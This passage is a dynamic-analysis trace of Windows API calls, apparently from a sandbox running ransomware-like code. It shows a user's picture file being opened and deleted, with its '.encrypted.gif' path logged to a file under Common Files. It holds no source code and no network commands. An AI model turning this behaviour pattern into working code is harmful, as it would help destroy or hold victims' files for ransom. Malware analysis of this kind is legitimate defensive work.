returned 1 [0040.205] CharLowerBuffW (in: lpsz="byte[80069]", cchLength=0xb | out: lpsz="byte[80069]") returned 0xb [0040.206] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0040.206] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0040.206] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0040.206] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0040.206] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0040.206] FreeLibrary (hLibModule=0x76b40000) returned 1 [0040.206] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0040.206] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0040.206] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0040.206] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19b8 | out: hHeap=0x770000) returned 1 [0040.206] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1940 | out: hHeap=0x770000) returned 1 [0040.206] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0040.206] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0040.206] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0040.206] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0040.206] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0040.206] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0040.206] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0040.206] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0040.206] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0040.207] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0040.207] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0040.207] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0040.207] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0040.207] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0040.207] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0040.207] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0040.207] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0040.207] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0040.207] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0040.207] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0040.207] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0040.207] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0040.207] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0040.207] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0040.207] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0040.207] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0040.207] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0040.207] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0040.207] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0040.208] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\EN4vTZXy-xQnxDkqMy.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oaci\\4hhx5h ujxbt\\en4vtzxy-xqnxdkqmy.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0040.208] FreeLibrary (hLibModule=0x76e10000) returned 1 [0040.209] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0040.209] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0040.209] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0040.209] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0040.209] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0040.209] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0040.209] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0040.209] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1aa8 | out: hHeap=0x770000) returned 1 [0040.209] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0040.209] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0040.209] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0040.209] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0040.209] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0040.209] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0040.209] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0040.209] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0040.209] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0040.209] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0040.209] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0040.209] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0040.209] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0040.209] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0040.209] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0040.209] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0040.209] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0040.209] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0040.209] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0040.209] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0040.209] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0040.209] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0040.209] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0040.209] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0040.209] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0040.209] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0040.209] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0040.210] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0040.210] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0040.210] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0040.210] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5bb8 | out: hHeap=0x770000) returned 1 [0040.210] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0040.210] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0040.210] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0040.210] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0040.210] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.210] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0040.210] FreeLibrary (hLibModule=0x76e10000) returned 1 [0040.210] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0040.210] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0040.210] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0040.210] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0040.210] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0040.210] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a08 | out: hHeap=0x770000) returned 1 [0040.210] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0040.210] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0040.210] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0040.210] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0040.211] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0040.211] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0040.211] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0040.211] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0040.211] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0040.211] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0040.211] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.211] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0040.211] FreeLibrary (hLibModule=0x76e10000) returned 1 [0040.211] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\EN4vTZXy-xQnxDkqMy.gif", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\EN4vTZXy-xQnxDkqMy.gif", lpFilePart=0x0) returned 0x4f [0040.211] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\EN4vTZXy-xQnxDkqMy.gif", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc97b4e0, ftCreationTime.dwHighDateTime=0x1d5b652, ftLastAccessTime.dwLowDateTime=0x33d385b0, ftLastAccessTime.dwHighDateTime=0x1d5b798, ftLastWriteTime.dwLowDateTime=0x17ad9d40, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x138c5, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="EN4vTZXy-xQnxDkqMy.gif", cAlternateFileName="EN4VTZ~1.GIF")) returned 0x7c2100 [0040.211] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\EN4vTZXy-xQnxDkqMy.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oaci\\4hhx5h ujxbt\\en4vtzxy-xqnxdkqmy.gif")) returned 1 [0040.213] FindNextFileW (in: hFindFile=0x7c2100, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc97b4e0, ftCreationTime.dwHighDateTime=0x1d5b652, ftLastAccessTime.dwLowDateTime=0x33d385b0, ftLastAccessTime.dwHighDateTime=0x1d5b798, ftLastWriteTime.dwLowDateTime=0x17ad9d40, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x138c5, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="EN4vTZXy-xQnxDkqMy.gif", cAlternateFileName="EN4VTZ~1.GIF")) returned 0 [0040.213] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0040.213] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.213] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0040.213] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0040.213] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0040.213] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0040.213] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0040.213] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0040.213] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0040.213] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0040.213] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0040.213] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0040.213] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0040.213] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0040.213] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0040.213] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0040.214] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0040.214] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0040.214] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="if", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0040.214] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gif", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0040.214] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".gif", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0040.214] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0040.214] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0040.214] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0040.214] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0040.214] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0040.214] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0040.214] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0040.214] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0040.214] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0040.214] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0040.214] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0040.214] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0040.214] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0040.214] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0040.214] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0040.214] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0040.214] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0040.215] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0040.215] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0040.215] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0040.215] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0040.215] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0040.215] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab2010 [0040.215] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0040.215] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0040.215] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x2cef, lpOverlapped=0x0) returned 1 [0040.216] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0040.216] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x2cef, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0040.216] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0040.216] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0040.216] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab2010 | out: hHeap=0x770000) returned 1 [0040.216] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0040.216] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0040.216] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\EN4vTZXy-xQnxDkqMy.encrypted.gif\r\n", cchWideChar=92, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 92 [0040.216] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x5c) returned 0x87aa40 [0040.216] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\EN4vTZXy-xQnxDkqMy.encrypted.gif\r\n", cchWideChar=92, lpMultiByteStr=0x87aa40, cbMultiByte=92, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\EN4vTZXy-xQnxDkqMy.encrypted.gif\r\n", lpUsedDefaultChar=0x0) returned 92 [0040.216] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0040.216] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x60) returned 0x87a9d8 [0040.216] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87aa40 | out: hHeap=0x770000) returned 1 [0040.216] WriteFile (in: hFile=0x140, lpBuffer=0x87a9d8*, nNumberOfBytesToWrite=0x5b, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x87a9d8*, lpNumberOfBytesWritten=0x6aee3c*=0x5b, lpOverlapped=0x0) returned 1 [0040.216] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87a9d8 | out: hHeap=0x770000) returned 1 [0040.216] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0040.216] CloseHandle (hObject=0x140) returned 1 [0040.217] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0040.217] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0040.217] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa0008 | out: hHeap=0x770000) returned 1 [0040.219] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0040.219] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0040.219] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0040.219] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0040.219] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0040.219] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0040.219] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0040.219] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0040.220] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0040.220] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0040.220] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0040.220] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0040.220] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0040.220] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0040.220] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0040.220] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0040.220] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0040.220] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0040.220] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5810 | out: hHeap=0x770000) returned 1 [0040.220] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0040.220] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0040.220] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0040.220] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0040.220] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0040.220] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0040.220] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) 